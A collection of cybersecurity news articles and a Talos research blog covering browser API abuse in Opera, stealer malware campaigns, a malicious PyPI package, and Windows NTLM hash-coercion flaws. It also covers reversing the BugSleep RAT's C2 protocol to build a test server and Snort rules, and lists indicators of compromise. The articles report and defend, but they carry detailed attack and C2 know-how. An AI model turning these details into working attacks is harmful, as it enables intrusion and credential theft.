Outages are inevitable. Our focus should be on minimizing their scope, addressing underlying causes, and understanding that protecting systems is about keeping bad actors out while maintaining stability and reliability.

Source: Igor Goncharenko via Alamy Stock Photo

COMMENTARY

In an era where digital security is paramount, organizations invest heavily in cybersecurity tools to defend against cyberattacks. However, these same tools — designed to protect — can sometimes be the cause of major disruptions. From botched updates to unforeseen errors in protective software, the very systems meant to safeguard us can lead to widespread outages, with the recent cases of CrowdStrike and Verizon standing out as prime examples. 

**The Fine Line Between Protection and Disruption**

Cybersecurity solutions are essential in our interconnected world, helping businesses and governments protect sensitive data, infrastructure, and user privacy. However, when improperly handled, even the best tools can turn from protectors into sources of failure. 

Known for its strong cybersecurity offerings, CrowdStrike rolled out a threat intelligence update to its Falcon platform in July that inadvertently caused a major global outage, affecting airlines, banks, and hospitals. This incident, which resulted from a software glitch during the delivery of its "Rapid Response Content" threat signatures, left critical services temporarily offline, reminding us that even the most advanced security systems aren't infallible. 

Similarly, in September, Verizon experienced a massive network outage that left millions of customers without mobile service across the US. Although the exact cause of the outage is still under investigation, fears of a cyberattack have been discussed. However, early signs suggest that it could have stemmed from a technical issue or mismanagement during a network upgrade — further highlighting how small oversights in maintaining or updating network infrastructure can have outsized consequences. 

**The Domino Effect: More Than Just an Inconvenience**

When cybersecurity or networking systems fail, the impact often ripples far beyond the initial disruption. Take Verizon's outage as an example: Businesses dependent on the network lost critical communication channels, customer service teams were unable to assist clients, and productivity ground to a halt for countless users. These events illustrate the profound dependency modern society has on digital infrastructure, and when that infrastructure falters, so do economies, health services, and day-to-day life. 

But outages like these also create windows of opportunity for cybercriminals. When networks are down or overwhelmed, attackers may exploit system vulnerabilities or use the chaos as cover for more nefarious activities, such as distributed-denial-of-service (DDoS) attacks, ransomware deployments, or supply chain compromises. Therefore, resilience and proper update protocols are just as important as the defensive capabilities of any cybersecurity tool. 

**Lessons for the Industry**

These high-profile outages, including Verizon's and CrowdStrike's, serve as reminders that robust cybersecurity involves more than just tools — it requires continuous testing, resilience planning, and careful management of system updates. 

Key takeaways for businesses include: 

*   Test updates thoroughly: Even the best security patches can introduce new risks if not properly vetted. 
    

*   Invest in incident response: Prepare for outages or failures by developing comprehensive response plans that prioritize minimizing downtime and ensuring customer communication. 
    

*   Stay vigilant: Disruptions provide opportunities for attackers. Ensure that security monitoring continues even during outages. 
    

**Looking Forward**

As technology evolves, so must our approach to cybersecurity. While outages are inevitable, the focus should be on minimizing their scope, addressing underlying causes, and understanding that protecting systems is not just about keeping bad actors out — it's also about maintaining stability and reliability within the infrastructure itself. 

Cybersecurity tools must balance protection with resilience, ensuring that the systems designed to defend us don't inadvertently cause more harm. 

**About the Author**

Director of Security, Owlet Baby Care

Yvonne Dickinson is currently the Director of Security for a global and publicly traded company. Her depth of expertise resides within application and cloud security, although she is a generalist across the other security domains. Yvonne is extremely passionate about advocating for women in STEM fields and strives to make an impact where she can. Although her official title is Security Director, that job is secondary to her primary role as CMO — Chief Mom Officer — to her family. As a technical leader, she strives to find balance in her work and her home so she can succeed at both her jobs, and she empowers her team to do the same.

When Cybersecurity Tools Backfire

Using a malicious Chrome extension, researchers showed how an attacker could use a now-fixed bug to inject custom code into a victim's Opera browser to exploit special and powerful APIs, used by developers and typically saved for only the most trusted sites.

Source: Tierfotoagentur via Alamy Stock Photo

Researchers have uncovered a fresh browser attack that compromises "private" application programming interfaces (APIs) in Opera to allow carte blanche over victims' browsers.

Browser APIs provide a bridge between Web applications and browser functionalities — including those related to security, storage, performance optimization, geolocation, and more — enabling the websites you visit to provide better, more robust features and experiences. Most browser APIs are publicly known, available to all, and rigorously reviewed.

Companies, however, have a habit of giving special permissions to their own preferred apps and sites. The Opera browser, for example, saves "private" APIs for several preferred third-party domains — such as Instagram, Atlassian, and Russia's Yandex and VK — as well as its own internal development domains, and those that are publicly reachable in the production version of the browser.

These private APIs may be useful for developers, but researchers from Guardio demonstrated how they could be accessed by hackers, too, allowing cyberattackers an array of powers imaginable from a browser: changing settings, hijacking accounts, disabling security extensions, adding further malicious extensions, and more. They did so with a canine-themed proof-of-concept attack they called "CrossBarking."

Related:Dark Reading Confidential: Pen-Test Arrests, 5 Years Later

**CrossBarking Opera Browser Attack**

The goal of CrossBarking is to run malicious code in the context of sites with access to those powerful, private APIs. To do that, one could make use of, for example, a cross-site scripting (XSS) vulnerability. Or, even easier, a malicious browser extension.

Getting a malicious extension onto Opera is no small feat. Many a developer has complained about just how drawn out its manual review process can be — taking months or even years in some cases. The upside is the comfort that Opera's 350 million active users enjoy: that the extensions they add to their browsers have been well and thoroughly vetted.

That isn't as much the case, however, for Chrome extensions, which Opera allows its users to download. Chrome add-ons undergo a largely automated review process, and might go live within just hours or days of being submitted for approval.

So, to leverage privileged Opera sites, Guardio researchers developed a Chrome extension, not an Opera one. They designed it to add pictures of puppies to webpages — a guise for running scripts on any given site — and covered its maliciousness enough to get approved on the Chrome store. If a puppy-loving Opera user adopted the extension and visited a site with private API access, it would perform a direct script injection attack to run malicious code and gain access to any powers afforded by those private APIs.

Related:When Cybersecurity Tools Backfire

To demonstrate the full breadth of power afforded by CrossBarking, Guardio researchers targeted the settingsPrivate API, which allows for reading and editing any available browser settings. They used settingsPrivate to change a hypothetical victim's Domain Name System (DNS) settings, funneling all of their browser activity through a malicious DNS server. From there, the researchers had full view into the victim's browsing activity, plus the ability to manipulate the content of webpages or redirect the victim to malicious pages.

"You could almost take control over the entire browser, and the computer hosting it," explains Nati Tal, head of Guardio Labs. Though his PoC focused on changing a specific browser setting, "in the same way, you can change any other setting. There are many more APIs to hack — \[we didn't\] have enough time to check all of the possibilities."

**Security vs. Functionality in Browser APIs**

In the eternal struggle between functionality and security, browser developers will not easily part with the special APIs that allow them powers beyond those afforded to the hoi polloi. That applies to Opera, and other browsers as well. In May, Guardio discovered a not-dissimilar issue with a private API used for marketing in another Chromium browser, Microsoft Edge.

Related:Recurring Windows Flaw Could Expose User Credentials

To fix the CrossBarking issue, Opera did not do away with its private APIs or its Chrome extension cross-compatibility. On Sept. 24, though, it did adopt a sort of quick-fix solution already implemented in Chrome: blocking the ability of any extension to run scripts on domains with private API access.

"The infrastructure of Chromium is \[such that\] vendors need to take control of their security, and think about all the possible attack vectors there are. There are so many possible vectors," Tal concludes.

He adds: "In this case, again, it wasn't even in their \[app store\]. Opera is not responsible for Chrome Store, but they do allow extensions from there, so they need to think about it as well. \[They have to see\] the entire ecosystem, not only this vulnerability, to keep up with the threat."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

'CrossBarking' Attack Targets Secret APIs, Exposes Opera Browser Users

Cybersecurity researchers have uncovered an ongoing malvertising campaign that abuses Meta's advertising platform and hijacked Facebook accounts to distribute information known as SYS01stealer.
"The hackers behind the campaign use trusted brands to expand their reach," Bitdefender Labs said in a report shared with The Hacker News.
"The malvertising campaign leverages nearly a hundred malicious

Cybersecurity researchers have uncovered an ongoing malvertising campaign that abuses Meta's advertising platform and hijacked Facebook accounts to distribute information known as SYS01stealer.

"The hackers behind the campaign use trusted brands to expand their reach," Bitdefender Labs said in a report shared with The Hacker News.

"The malvertising campaign leverages nearly a hundred malicious domains, utilized not only for distributing the malware but also for live command and control (C2) operations, allowing threat actors to manage the attack in real-time."

SYS01stealer was first documented by Morphisec in early 2023, describing attack campaigns targeting Facebook business accounts using Google ads and fake Facebook profiles that promote games, adult content, and cracked software.

Like other stealer malware, the end goal is to steal login credentials, browsing history, and cookies. But it's also focused on obtaining Facebook ad and business account data, which is then used to propagate the malware further via phony ads.

"The hijacked Facebook accounts serve as a foundation for scaling up the entire operation," Bitdefender noted. "Each compromised account can be repurposed to promote additional malicious ads, amplifying the reach of the campaign without the hackers needing to create new Facebook accounts themselves."

The primary vector through which SYS01stealer is distributed is via malvertising across platforms like Facebook, YouTube, and LinkedIn, with the ads promoting Windows themes, games, AI software, photo editors, VPNs, and movie streaming services. A majority of the Facebook ads are engineered to target men aged 45 and above.

"This effectively lures victims into clicking these ads and having their browser data stolen," Trustwave said in an analysis of the malware in July 2024.

"If there is Facebook-related information in the data, there is a possibility of not only having their browser data stolen but also having their Facebook accounts controlled by the threat actors to further spread malvertisements and continue the cycle."

Users who end up interacting with the ads are redirected to deceptive sites hosted on Google Sites or True Hosting that impersonate legitimate brands and applications in an attempt to initiate the infection. The attacks are also known to use hijacked Facebook accounts to publish fraudulent ads.

The first stage payload downloaded from these sites is a ZIP archive that includes a benign executable, which is used to sideload a malicious DLL responsible for decoding and launching the multi-stage process.

This includes running PowerShell commands to prevent the malware from running in a sandboxed environment, modifying Microsoft Defender Antivirus settings to exclude certain paths to avoid detection, and setting up an operating environment to run the PHP-based stealer.

In the latest attack chains observed by the Romanian cybersecurity company, the ZIP archives come embedded with an Electron application, suggesting that the threat actors are continuously evolving their strategies.

Also present within the Atom Shell Archive (ASAR) is a JavaScript file ("main.js") that now executes the PowerShell commands to perform sandbox checks and execute the stealer. Persistence on the host is achieved by setting up scheduled tasks.

"The adaptability of the cybercriminals behind these attacks makes the SYS01 infostealer campaign especially dangerous," Bitdefender said. "The malware employs sandbox detection, halting its operations if it detects it's being run in a controlled environment, often used by analysts to examine malware. This allows it to remain undetected in many cases."

"When cybersecurity firms begin to flag and block a specific version of the loader, the hackers respond swiftly by updating the code. They then push out new ads with updated malware that evades the latest security measures."

**Phishing Campaigns Abuse Eventbrite**

The development comes as Perception Point detailed phishing campaigns that misuse the Eventbrite events and ticketing platform to steal financial or personal information.

The emails, delivered via noreply@events.eventbrite\[.\]com, prompt users to click on a link to pay an outstanding bill or confirm their package delivery address, after which they are asked to enter their login and credit card details.

The attack itself is made possible by the fact that the threat actors sign up for legitimate accounts on the service and create fake events by abusing the reputation of a known brand, embedding the phishing link within the event description or attachment. The event invite is then sent to their targets.

"Because the email is sent via Eventbrite's verified domain and IP address, it is more likely to pass email filters, successfully reaching the recipient's inbox," Perception Point said.

"The Eventbrite sender domain also increases the likelihood that recipients will open the email and click through to the phishing link. This abuse of Eventbrite's platform enables the attackers to evade detection, ensuring higher delivery and open rates."

**Pig Butchering of a Different Kind**

Threat hunters are also calling attention to an increase in cryptocurrency fraud that impersonates various organizations to target users with bogus job lures that purportedly allow them to earn money while working from home. The unsolicited messages also claim to represent legitimate brands like Spotify, TikTok, and Temu.

The activity commences via social media, SMS, and messaging apps like WhatsApp and Telegram. Users who agree to take up the jobs are instructed by the scammers to register on a malicious website using a referral code, following which they are asked to complete various tasks – submit fake reviews, place product orders, play specific songs on Spotify, or book hotels.

The scam unfolds when victims' fake commission account balance suddenly goes into the negative and they are urged to top up by investing their own cryptocurrency in order to earn bonuses off the tasks.

"This vicious cycle will continue as long as the scammers think the victim will keep paying into the system," Proofpoint researchers said. "If they suspect their victim has become wise to the scam, they will lock their account and ghost them."

The illicit scheme has been attributed with high confidence to threat actors who also conduct pig butchering, which is also known as romance-based cryptocurrency investment fraud.

"The job fraud has smaller but more frequent returns for the fraudsters compared to pig butchering," Proofpoint said. "The activity leverages popular brand recognition in place of a long, romance-based confidence scam."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Malvertising Campaign Hijacks Facebook Accounts to Spread SYS01stealer Malware

Cybersecurity researchers have discovered a new malicious Python package that masquerades as a cryptocurrency trading tool but harbors functionality designed to steal sensitive data and drain assets from victims' crypto wallets.
The package, named "CryptoAITools," is said to have been distributed via both Python Package Index (PyPI) and bogus GitHub repositories. It was downloaded over 1,300

Cybercrim / Cryptocurrency

Cybersecurity researchers have discovered a new malicious Python package that masquerades as a cryptocurrency trading tool but harbors functionality designed to steal sensitive data and drain assets from victims' crypto wallets.

The package, named "CryptoAITools," is said to have been distributed via both Python Package Index (PyPI) and bogus GitHub repositories. It was downloaded over 1,300 times before being taken down on PyPI.

"The malware activated automatically upon installation, targeting both Windows and macOS operating systems," Checkmarx said in a new report shared with The Hacker News. "A deceptive graphical user interface (GUI) was used to distract vic4ms while the malware performed its malicious ac4vi4es in the background."

The package is designed to unleash its malicious behavior immediately after installation through code injected into its "\_\_init\_\_.py" file that first determines if the target system is Windows or macOS in order to execute the appropriate version of the malware.

Present within the code is a helper functionality that's responsible for downloading and executing additional payloads, thereby kicking-off a multi-stage infection process.

Specifically, the payloads are downloaded from a fake website ("coinsw\[.\]app") that advertises a cryptocurrency trading bot service, but is in fact an attempt to give the domain a veneer of legitimacy should a developer decide to navigate to it directly on a web browser.

This approach not only helps the threat actor evade detection, but also allows them to expand the malware's capabilities at will by simply modifying the payloads hosted on the legitimate-looking website.

A notable aspect of the infection process is the incorporation of a GUI component that serves to distract the victims by means of a fake setup process while the malware is covertly harvesting sensitive data from the systems.

"The CryptoAITools malware conducts an extensive data theft operation, targeting a wide range of sensitive information on the infected system," Checkmarx said. "The primary goal is to gather any data that could aid the attacker in stealing cryptocurrency assets."

This includes data from cryptocurrency wallets (Bitcoin, Ethereum, Exodus, Atomic, Electrum, etc.), saved passwords, cookies, browsing history, cryptocurrency extensions, SSH keys, files stored in Downloads, Documents, Desktop directories that reference cryptocurrencies, passwords, and financial information, and Telegram.

On Apple macOS machines, the stealer also takes the step of collecting data from Apple Notes and Stickies apps. The gathered information is ultimately uploaded to the gofile\[.\]io file transfer service, after which the local copy is deleted.

Checkmarx said it also discovered the threat actor distributing the same stealer malware through a GitHub repository named Meme Token Hunter Bot that claims to be "an AI-powered trading bot that lists all meme tokens on the Solana network and performs real-time trades once they are deemed safe."

This indicates that the campaign is also targeting cryptocurrency users who opt to clone and run the code directly from GitHub. The repository, which is still active as of writing, has been forked once and starred 10 times.

Also managed by the operators is a Telegram channel that promotes the aforementioned GitHub repository, as well as offers monthly subscriptions and technical support.

"This multi-platform approach allows the attacker to cast a wide net, potentially reaching victims who might be cautious about one platform but trust another," Checkmarx said.

"The CryptoAITools malware campaign has severe consequences for victims and the broader cryptocurrency community. Users who starred or forked the malicious 'Meme-Token-Hunter-Bot' repository are potential victims, significantly expanding the attack's reach."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover Python Package Targeting Crypto Wallets with Malicious Code

What is known about the Spoofing – Windows MSHTML Platform (CVE-2024-43573) vulnerability from the October Microsoft Patch Tuesday? In fact, just that it is being exploited in the wild. There are no write-ups or public exploits yet. The Acknowledgements section in the Microsoft bulletin is empty. It is not clear who reported it and from […]

**What is known about the Spoofing – Windows MSHTML Platform (CVE-2024-43573) vulnerability from the** **October Microsoft Patch Tuesday****?** In fact, just that it is being exploited in the wild. There are no write-ups or public exploits yet. The Acknowledgements section in the Microsoft bulletin is empty. It is not clear who reported it and from whom we can expect details.

ZDI suggested that this could be an additional fix for a similar July vulnerability **Spoofing** – Windows MSHTML Platform (CVE-2024-38112). The vulnerability type and component are the same. The July vulnerability was about “.url” file handling and was exploited by the APT group Void Banshee to install the Atlantida Stealer malware. Attackers may have bypassed the initial fix, prompting Microsoft to release a new patch. So far, this is only an assumption. But the vulnerability shouldn’t be ignored despite its low CVSS Base score (6.5).

На русском

Hi! My name is Alexander and I am a Vulnerability Management specialist. You can read more about me here. Currently, the best way to follow me is my Telegram channel @avleonovcom. I update it more often than this site. If you haven’t used Telegram yet, give it a try. It’s great. You can discuss my posts or ask questions at @avleonovchat.

А всех русскоязычных я приглашаю в ещё один телеграмм канал @avleonovrus, первым делом теперь пишу туда.

What is known about the Spoofing – Windows MSHTML Platform (CVE-2024-43573) vulnerability from the October Microsoft Patch Tuesday?

This blog will demonstrate the practice and methodology of reversing BugSleep’s protocol, writing a functional C2 server, and detecting this traffic with Snort.

Wednesday, October 30, 2024 06:00

In June 2024, security researchers published their analysis of a novel implant dubbed “MuddyRot”(aka "BugSleep"). This remote access tool (RAT) gives operators reverse shell and file input/output (I/O) capabilities on a victim’s endpoint using a bespoke command and control (C2) protocol. This blog will demonstrate the practice and methodology of reversing BugSleep’s protocol, writing a functional C2 server, and detecting this traffic with Snort. 

**Key findings **

*   BugSleep implant implements a bespoke C2 protocol over plain TCP sockets. 
*   BugSleep operators have demonstrated multiple file-obfuscation techniques to avoid detection. 
*   BugSleep implements reverse shell, file I/O, and persistence capabilities on the target system. 

**Sending and receiving data **

This blog will use sample b8703744744555ad841f922995cef5dbca11da22565195d05529f5f9095fbfca for analysis. Two of the lowest functions in the C2 stack, referred to as SendSocket (FUN\_1400034c0) and ReadSocket (FUN\_140003390), are very light wrappers for the send and receive API functions and handle payload encryption. They include some error handling by attempting to send or receive data 10 times before failing.  

This protocol uses a pseudo-TLV (Type Length Value) structure with only two types: integer or string. Integers are sent as little-endian 4- or 8-byte values, and strings are prepended with the 4-byte value of its length. Payloads are then encrypted by subtracting a static value from each byte in the buffer (in this sample it is three).  

Type 

Value 

Plain text 

Cipher text 

IntegerMsg 

6 

06 00 00 00 

03 FD FD FD 

StringMsg  

Talos 

05 00 00 00 48 65 6C 6C 6F 

02 FD FD FD 51 5E 69 6C 70

_Figure 1: Example of data encryption used by BugSleep_

There are two main functions for handling C2 communications: C2Loop (FUN\_1400012c0) and CommandHandler (FUN\_1400028a0). C2Loop is responsible for setting up socket connections with the server and sending a beacon, while CommandHandler is responsible for processing and executing commands from the server. 

After setting up the socket connection, the implant beacons (FUN\_140003d80) to the C2 server for a command. The beacon is a StringMsg in the form ComputerName/Username. If the server responds with an IntegerMsg equal to 0x03, BugSleep will terminate itself. We suspect this is remnants of an old kill command or an emergency kill without the overhead of reading the real kill command later. 

Each BugSleep command is sent as an IntegerMsg after the beacon response. The following enumeration defines all the command IDs discovered. 

Figure 2: Command IDs used by implant 

**Phoning home **

The implant communicates using plain TCP sockets, which can be seen using a Netcat listener and Wireshark. 

Figure 3: BugSleep beacon as seen through Wireshark. 

Recalling the message encryption demonstrated in Figure 1, the beacon can be decrypted with a little bit of Python (Figure 4). This will be used again when building the rest of the C2 server.  

Figure 4: Decoding beacon data 

**Python C2 server **

With an understanding of the protocol basics, it is time to start building the C2 server. Full source code can be found here. 

**Beacon **

As mentioned earlier, the BugSleep beacon function sends a StringMsg and reads an IntegerMsg response from the server. Since the IntegerMsg returned can be anything but 0x03, we returned the length of the Computer Name/Username string received by the server.

Figure 5: Output from C2 server receiving beacon data 

**Ping command **

The simplest command to implement is the Ping command. It has the command ID of 0x63 (BugSleep subtracts one from whatever ID it receives). The code is simple: send back 4 bytes.  

Figure 6: Switch case for handling ping command 

Once the beacon comes in, the server is responsible for: 

1.  Sending 4 bytes for beacon response 
2.  Sending 4 bytes for Ping command ID 
3.  Reading 4 bytes of Ping data 

The ping command was observed sending back 4 bytes recently allocated on the heap, so it's not guaranteed to know what that data looks like. To validate things are really working, a breakpoint can be set in WinDbg and memory set manually before being sent. 

Figure 7: Confirming 0xdeadbeef written to memory is received by the server in a Ping command 

**File commands **

The next set of commands are responsible for downloading files onto the compromised system or uploading files to the C2 server (PutFile and GetFile, respectively). These commands are inverses of each other, so only the GetFile command will be discussed in detail. The methodology was to trace each call to SendSocket or ReadSocket and implement the response for that call in Python. In CommandHandler, the implant reads the length and value off the wire. This is the file to be retrieved.  

Figure 8: GetFile reading path string length and path string from socket 

The CmdGetFile function opens the target file and chunks it over the socket one page at a time. The list of SendSocket calls is as follows: 

Figure 9: SendSocket calls made by CmdGetFile function 

Figure 10: Example C2 server output from GetFile command 

The PutFile command differs slightly from the GetFile command with how it uses pointer math to process incoming pages. 

Figure 11: Tricky file pointer math 

This translates to each page starting with a 4-byte page number followed by 1020 bytes (or 0x3fc) of file data, which the GetFile command does not do; it sends full 1024-byte pages of file data without page numbers. 

**Reverse shell **

The last command is the reverse shell. This is the most complex because it requires many reads and writes over the socket. The disassembly is rather long and difficult to keep track of the socket calls, so we have omitted it. Effectively, the implant spawns a cmd.exe process (FUN\_1400016e0) and reads the command to execute from the socket. The shell command and its output are marshaled between the processes via pipes during the session. The complexity of this operation comes from BugSleep incrementally reporting return values from pipe API calls while attempting to read shell output (FUN\_140003840). The implant will enter this loop of reading commands and sending output until it receives the string “terminate\\n”.  

Figure 12: Example output from C2 server running the reverse shell command 

The rest of the commands are less complex but have been implemented and are viewable here. 

**Snort detection **

This server gives Talos the ability to emulate any number of conversations between BugSleep and its operators. This traffic is crucial for writing and validating our detections’ performance in the wild. 

The initial candidate for detection would be the beacon. It is the first opportunity to shut down communications, isolating any BugSleep instance from receiving commands. It was observed that each beacon has the form of <len><data>, where data is sub\_string(COMPUTER\_NAME + "/" + USERNAME, 3). This string is not long or static, which makes it a poor candidate for a fast\_pattern; however, recall that each beacon is prepended with a 4-byte length of this string. A Computer Name/Username string from any given victim is unlikely to be longer than 255 characters. This means most length fields are going to look like |XX 00 00 00| or |XX FD FD FD| when encoded. This could be a quick match, early in the stream, at a static offset, making it a decent fast\_pattern candidate. 

Figure 13: Detecting higher order encoded zero bytes of beacons sent from BugSleep 

 This will work but is likely to cause false-positives (FP) in the wild. Every sample of BugSleep was seen using port 443. The implant is also reaching outside the network to a C2 server, so traffic to be inspected by this rule can be reduced using the following header: 

Figure 14: Restricting rule to inspect traffic leaving the network to port 443 

The flow:to\_server,established option can be used to restrict Snort to data coming from a client over established TCP streams. The FP-rate on this rule still isn't great. Any TCP traffic leaving the network on port 443 with |FD FD FD| at offset 1 will alert. That might sound unique, but it does not indicate with confidence that the traffic is a BugSleep beacon. 

One powerful tool in Snort to add more logic or state to rules is flowbits. These allow a writer to have a sense of state within a stream across multiple rules. In this case, the beacons aren't enough to reliably alert on. What if we use flowbits to chain beacons with the commands being sent back? The commands themselves don't provide much content, as they are variable length non-deterministic strings (e.g., get, put, etc.) or a nondeterministic 4-byte integer (e.g., heartbeat, increment timeout, etc.). They do, however, all start with a 4-byte command ID. Setting a flowbit when a beacon leaves the network will allow another rule down the line to alert with higher confidence if it sees a command ID come back in the same stream. 

**Command rules **

The pcre rule option can be used to reduce 11 rules down to one. Like the beacon rule, the three zero bytes, encoded as |03|, can be used as a fast\_pattern. Once the rule has entered, the bugsleep\_beacon flowbit check can be performed to help the rule exit quickly in the event of a false positive. After the three |03| bytes are confirmed to be at offset five, a PCRE can verify one of the command IDs is present.  

Figure 15: Snort rule for detecting BugSleep command sent from C2 server 

**Sharp edges **

Sometimes, we are reminded that Snort can handle or interpret data differently than expected. Conveniently, this sample’s traffic was a perfect example and opportunity to peek under the hood and see what Snort sees. Originally, our beacon rule looked like this, trying to catch the encoded forward-slash that is always present in the Computer Name/Username string (encoded as a comma).  

Figure 16: Beacon rule attempting to catch forward-slash in Computer Name/Username string 

Recall that the implant will: 

1.  Connect to the server 
2.  Send a string length (4 bytes) 
3.  Send the PC/User string N bytes 
4.  Read 4 bytes back to ensure a response 
5.  Read 4-byte command ID and N command data bytes 
6.  Start sending command responses 

As Snort is reading data over the wire, it is interpreting it and sorting it into different buffers (pkt\_data, file\_data, js\_data, http\_\*, etc.). In this case, as TCP data is being chunked along the wire, Snort is looking at those individual TCP segments. Only after it has enough data will it flush into the larger "TCP stream" buffer so a rule can parse the entire stream sent from a client or server. 

Initially, the get command traffic was alerting while the put command traffic was not. Fortunately, Snort 3 comes with a tracing module to help debug these issues. The buffer option will print out Snort’s different buffers as they are filled and rule\_eval will trace the rule as it is evaluated. The following screenshots are output from individual runs of Snort against each PCAP. “snort.raw” represents an individual packet, while “snort.stream\_tcp” represents a reassembled TCP stream. 

At the start of the working GetFile command, the beacon size and data can be seen as two separate packets (Figure 17).  

Figure 17: Individual beacon packets being processed by Snort 

Further down, the reassembled TCP stream can be seen being inspected and alerted on. Moving from the top to bottom in Figure 18, the cursor position and state of the buffer can be observed changing as the rule is evaluated. At the end, the flowbit is set and made available for the command rule.

Figure 18: Snort trace output setting flowbit for BugSleep beacon 

Further down, the TCP stream for the command data is processed. The higher-order zeroes of the command are found, the flowbit checked, the PCRE performed, and the SID alerts as expected.  

Figure 19: Get file command rule alerts on traffic as expected 

When the results of the put file command traffic are inspected, a different behavior is observed. The individual packets for beacon length and beacon data are seen coming in; however, the first reassembled TCP stream that Snort is inspecting is the command being sent back to the implant. Figure 20 shows the command ID being found and then the flowbit check failing. 

Figure 20: Put file command traffic failing flowbit check 

Scrolling further in the log reveals the TCP stream for the beacon data is eventually populated and Snort sets the flowbit as expected. The stream for the command ID, however, has already passed and failed analysis because of the unset flowbit, resulting in no alert. The cause of this issue is the raw packets coming from the client not being reassembled into a TCP stream by the time the server packets are reassembled and inspected. This happens because Snort only reassembles when it has enough data, and 20 bytes is not enough yet. 

**The fix **

Unfortunately, the beacon rule must be tweaked so it can alert as soon as possible and not rely on the TCP reassembly. Recall that the beacon function invokes SendSocket twice, once for 4-length bytes and again for the beacon data. This means the first packet Snort sees will only be 4 bytes long. Adding “bufferlen:=4” restricts Snort to only look at 4-byte packets, significantly reducing any FP rate. Our solution ended up being this:  

Figure 21: Fixed beacon rule looking for 4-byte length segments 

 Now the rules work as expected!  

Figure 22: Snort output alerting on traffic from all BugSleep commands 

**Conclusion **

Since BugSleep is a new implant and weekly releases were observed being deployed, this protocol might change and bypass these rules. However, two things have been accomplished: 

1.  This variant will no longer communicate over our customers’ networks. 
2.  Attackers must invest development time and money to use BugSleep again. 

The published Snort SIDs covering this traffic are 63937 and 63938.  

**Indicators of compromise **

Hosts: 

*   1\[.\]235\[.\]234\[.\]202 
*   146\[.\]19\[.\]143\[.\]14 
*   46\[.\]19\[.\]143\[.\]14 
*   5\[.\]239\[.\]61\[.\]97 

Hashes 

The following Windows executables were collected during our research. Assuming these have not been manipulated, the compilation time for this set of binaries indicates weekly releases of BugSleep. 

SHA256 

Compile Time 

b8703744744555ad841f922995cef5dbca11da22565195d05529f5f9095fbfca 

Wed., May 8 00:55:53 2024 UTC 

94278fa01900fdbfb58d2e373895c045c69c01915edc5349cd6f3e5b7130c472 

Wed., May 22 21:56:39 2024 UTC 

73c677dd3b264e7eb80e26e78ac9df1dba30915b5ce3b1bc1c83db52b9c6b30e 

Fri., May 31 23:29:21 2024 UTC 

5df724c220aed7b4878a2a557502a5cefee736406e25ca48ca11a70608f3a1c0 

Sun., Jul 07 21:09:49 2024 UTC 

960d4c9e79e751be6cad470e4f8e1d3a2b11f76f47597df8619ae41c96ba5809 

Sat., Jul 15 09:15:20 2079 UTC

Writing a BugSleep C2 server and detecting its traffic with Snort

Now a zero-day, the vulnerability enables NTLM hash theft, an issue that Microsoft has already fixed twice before.

Source: tdhster via Shutterstock

All versions of Windows clients, from Windows 7 through current Windows 11 versions, contain a 0-day vulnerability that could allow attackers to capture NTLM authentication hashes from users of affected systems.

Researchers at ACROS Security reported the flaw to Microsoft this week. They discovered the issue while writing a patch for older Windows systems for CVE-2024-38030, a medium-severity Windows Themes spoofing vulnerability that Microsoft mitigated in its July security update.

**Variant of Two Previous Vulnerabilities**

The vulnerability that ACROS discovered is very similar to CVE-2024-38030 and enables what is known as an authentication coercion attack, where a vulnerable device is essentially coerced into sending NTLM hashes — the cryptographic representation of a user's password — to an attacker's system. Akamai researcher Tomer Peled discovered CVE-2024-38030 while analyzing Microsoft's fix for CVE-2024-21320, another, earlier Windows themes spoofing vulnerability he discovered and reported to Microsoft. The flaw that ACROS uncovered is a new, separate vulnerability related to the two flaws Peled reported earlier.

Windows themes files allow users to customize the appearance of their Windows desktop interface via wallpapers, screen savers, colors, and sounds. Both the vulnerabilities that Akamai researcher Peled discovered had to do with the manner in which the themes handled file paths to a couple of image resources, specifically "BrandImage" or "Wallpaper." Peled found that because of improper validation, an attacker could manipulate the legitimate path to these resources in such a way as to get Windows to automatically send an authenticated request, along with the user's NTLM hash, to the attacker's device.

As Peled explains to Dark Reading, "The themes file format is an .ini file, with multiple 'key,value' pairs. I originally found two key,value pairs that could accept file paths," he says.

The original vulnerability (CVE-2024-21320) stemmed from the fact that the key,value pairs accepted UNC paths — a standardized format for identifying network resources like shared files and folders — for network drives, Peled notes. "This \[meant\] that a weaponized theme file, with a UNC path, could trigger an outbound connection with user authentication, without them knowing." Microsoft fixed the issue by adding a check on the file path to ensure it wasn't a UNC path. But, Peled says, the function Microsoft used for this validation allowed for some bypasses, which is what led to Peled's discovery of the second vulnerability (CVE-2024-38030).

**Microsoft Will Act 'As Needed'**

What ACROS Security reported this week is the third Windows themes spoofing vulnerability rooted in the same file path issue. "Our researchers discovered the vulnerability in early October while writing a patch for CVE-2024-38030 intended for legacy Windows systems many of our users are still using," says Mitja Kolsek, CEO of ACROS Security. "We reported this issue to Microsoft \[on\] Oct. 28, 2024, but we did not release details or a proof-of-concept, which we plan to do after Microsoft has made their own patch publicly available."

A Microsoft spokesman said via email the company is aware of the ACROS report and "will take action as needed to help keep customers protected." The company does not appear to have issued a CVE, or vulnerability identifier, for the new issue yet.

Like the two previous Windows themes spoofing vulnerabilities that Akamai discovered, the new one that ACROS found also does not require an attacker to have any special privileges. "But they have to somehow get the user to copy a theme file to some other folder on their computer, then open that folder with Windows Explorer using a view that renders icons," Kolsek says. "The file could also be automatically downloaded to their Downloads folder while visiting \[an\] attacker's website, in which case the attacker would have to wait for the user to view the Downloads folder at a later time."

Kolsek recommends that organizations disable NTLM where possible, but acknowledges that doing so could cause functional problems if any network components rely on it. "\[An\] attacker could only successfully target a computer where NTLM is enabled," he says. "Another requirement is that a request initiated by a malicious theme file would be able to reach the attacker's server on the Internet or in an adjacent network," something that firewalls should typically block, he says. As a result, it's more likely than an attacker would try to exploit the flaw in a targeted campaign more so than in a mass exploit.

